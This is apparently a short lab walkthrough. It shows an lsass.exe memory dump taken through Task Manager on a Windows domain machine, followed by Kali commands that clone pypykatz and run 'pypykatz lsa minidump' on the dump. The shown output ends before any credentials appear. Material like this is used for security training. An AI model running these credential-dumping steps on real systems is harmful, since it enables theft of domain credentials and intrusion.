Analyze the memory of the lsass.exe process

![](https://i.imgur.com/SvQfjvd.png)

Let's try to access domain resources.

![](https://i.imgur.com/77QOrHu.png)

Log in under Petr's account.

![](https://i.imgur.com/LgVw0hr.png)

Run the command prompt as administrator.

![](https://i.imgur.com/ttODD2m.png)
![](https://i.imgur.com/pqvflzO.png)

Open the detailed view, go to the Details tab and find the lsass.exe process.

![](https://i.imgur.com/xjkPG2R.png)
![](https://i.imgur.com/5mF5F21.png)
![](https://i.imgur.com/vZRcBgf.png)
![](https://i.imgur.com/enouSGr.png)
![](https://i.imgur.com/ypuScw9.png)
![](https://i.imgur.com/I0dTG7H.png)
![](https://i.imgur.com/S30eyxB.png)
![](https://i.imgur.com/CbbUFkF.png)
![](https://i.imgur.com/2XnaFQx.png)

```
┌──(root㉿kali)-[~]
└─# ls /home/kali
Desktop  Documents  Downloads  lsass.DMP  Music  Pictures  Public  Templates  Videos

┌──(root㉿kali)-[~]
└─# cd /home/kali

┌──(root㉿kali)-[/home/kali]
└─# git clone https://github.com/skelsec/pypykatz
Cloning into 'pypykatz'...
remote: Enumerating objects: 2933, done.
remote: Counting objects: 100% (313/313), done.
remote: Compressing objects: 100% (163/163), done.
remote: Total 2933 (delta 169), reused 167 (delta 150), pack-reused 2620
Receiving objects: 100% (2933/2933), 884.81 KiB | 3.95 MiB/s, done.
Resolving deltas: 100% (1885/1885), done.
```
```
┌──(root㉿kali)-[/home/kali]
└─# cd pypykatz/pypykatz

┌──(root㉿kali)-[/home/kali/pypykatz/pypykatz]
└─# pypykatz lsa minidump /home/kali/lsass.DMP
INFO:root:Parsing file /home/kali/lsass.DMP
FILE: ======== /home/kali/lsass.DMP =======
```